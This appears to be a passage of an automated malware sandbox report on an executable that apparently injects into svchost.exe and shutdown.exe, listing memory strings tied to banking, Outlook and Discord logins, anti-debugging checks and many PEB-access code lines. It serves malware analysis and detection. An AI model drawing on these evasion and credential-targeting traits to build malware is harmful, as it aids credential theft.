Source: shutdown.exe, 00000004.00000002.3786282874.0000000007649000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: n PasswordVMware20,11696501413
Source: 8430F899.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: 8430F899.4.dr	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: 8430F899.4.dr	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: 8430F899.4.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: 8430F899.4.dr	Binary or memory string: global block list test formVMware20,11696501413
Source: 8430F899.4.dr	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: 8430F899.4.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: 8430F899.4.dr	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: 8430F899.4.dr	Binary or memory string: discord.comVMware20,11696501413f
Source: 8430F899.4.dr	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\shutdown.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_0327096E rdtsc

2_2_0327096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 2_2_004178E3 LdrLoadDll,

2_2_004178E3

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004DEAA2 BlockInput,

0_2_004DEAA2

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_00492622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00492622

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe

Code function: 0_2_004642DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_004642DE

Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_00484CE8 mov eax, dword ptr fs:[00000030h]	0_2_00484CE8
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_010275A8 mov eax, dword ptr fs:[00000030h]	0_2_010275A8
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_01027608 mov eax, dword ptr fs:[00000030h]	0_2_01027608
Source: C:\Users\user\Desktop\KcSzB2IpP5.exe	Code function: 0_2_01025F88 mov eax, dword ptr fs:[00000030h]	0_2_01025F88
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h]	2_2_0326A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]	2_2_0322C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]	2_2_03250310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]	2_2_032D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]	2_2_032B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov ecx, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h]	2_2_032B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]	2_2_032FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]	2_2_032D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h]	2_2_0322E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]	2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h]	2_2_0325438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h]	2_2_03228397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h]	2_2_032403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0324E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]	2_2_032663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]	2_2_032EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0323A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h]	2_2_032383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov ecx, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h]	2_2_032DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]	2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h]	2_2_032D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]	2_2_0322823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h]	2_2_03234260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]	2_2_0322826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h]	2_2_032E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h]	2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B8243 mov ecx, dword ptr fs:[00000030h]	2_2_032B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]	2_2_0322A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]	2_2_03236259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]	2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h]	2_2_032EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]	2_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h]	2_2_032402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h]	2_2_032C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]	2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h]	2_2_0326E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h]	2_2_032B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h]	2_2_032402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0323A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]	2_2_03260124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DE10E mov ecx, dword ptr fs:[00000030h]	2_2_032DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov ecx, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h]	2_2_032DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]	2_2_032F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov ecx, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h]	2_2_032C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]	2_2_0322C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]	2_2_032C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]	2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h]	2_2_03236154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]	2_2_03270185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]	2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h]	2_2_032EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]	2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h]	2_2_032D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h]	2_2_032B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h]	2_2_0322A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]	2_2_033061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]	2_2_032601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]	2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h]	2_2_032F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_032AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]	2_2_0322A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]	2_2_0322C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]	2_2_032C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]	2_2_032B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h]	2_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h]	2_2_0324E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]	2_2_0325C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]	2_2_03232050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]	2_2_032B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]	2_2_032C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h]	2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_032F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]	2_2_0323208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0322A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]	2_2_032380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]	2_2_032B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0322C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]	2_2_032720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]	2_2_032B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]	2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]	2_2_0326C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]	2_2_0326273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]	2_2_032AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]	2_2_0326C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]	2_2_03230710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]	2_2_03260710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]	2_2_03238770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]	2_2_03240770
